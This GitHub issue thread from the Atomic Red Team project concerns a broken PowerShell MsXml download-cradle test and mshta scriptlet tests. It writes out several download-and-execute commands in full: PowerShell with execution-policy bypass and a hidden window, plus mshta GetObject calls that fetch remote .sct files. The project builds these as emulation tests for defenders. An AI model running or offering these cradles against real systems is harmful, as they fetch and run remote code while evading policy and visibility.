### ISSUE TITLE
T1086.yaml - Powershell MsXml COM object - PS command broken

### ISSUE THREAD

**Issue by phr3sh** [redcanaryco/atomic-red-team#466]
# Report

## What did you do?
Run `powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"`

## What did you expect to happen?

ℹ Please replace this with what you expected to happen.
e.g. The atomic test executes and a command line (PS) pops showing the current date and text "Download Cradle test success!"

## What happened instead?
PowerShell error.

I think this test case has 2 problems:
1.- powershell.exe IEX -exec... doesn't work and "IEX" should be removed.
2.- powershell.exe argument `-windowstyle hidden` doesn't let us see the expected "success" text. (this happens on several other test cases btw)

I propose the following command instead:
`powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"`

## Your Environment

* Which *specific* operating system are you running (e.g. Windows 7 SP1 32-bit)?
Windows10
* Did you run the test from an elevated or root prompt?
No
* If relevant, which atomic test is this specific to?
T1086 - #7 - Powershell MsXml COM object
* If relevant, which [execution harness](2) are you attempting to use?
python

[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"

**Comment by ekisa** [comment]
Using fully patched Windows10.

The Powershell command:
C:\mitre> mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct").Exec();close();

Exception:
At line:1 char:159
+ ... ic-red-team/master/atomics/T1086/payloads/mshta.sct").Exec();close();
+                                                                        ~
An expression was expected after '('.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression



Also;
Lolbas script fails as well.
C:\mitre> mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();

Exception:
At line:1 char:154
+ ... ect/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
+                                                                        ~
An expression was expected after '('.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression

**Comment by caseysmithrc** [comment]
This needs fixed.  There is a quote inside the string that breaks the command.  We'll fix that.
In the meantime this should do the trick.
cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct').Exec();close();

Note the use of single quote to wrap the url.

**Comment by MHaggis** [comment]
All set! Thank you
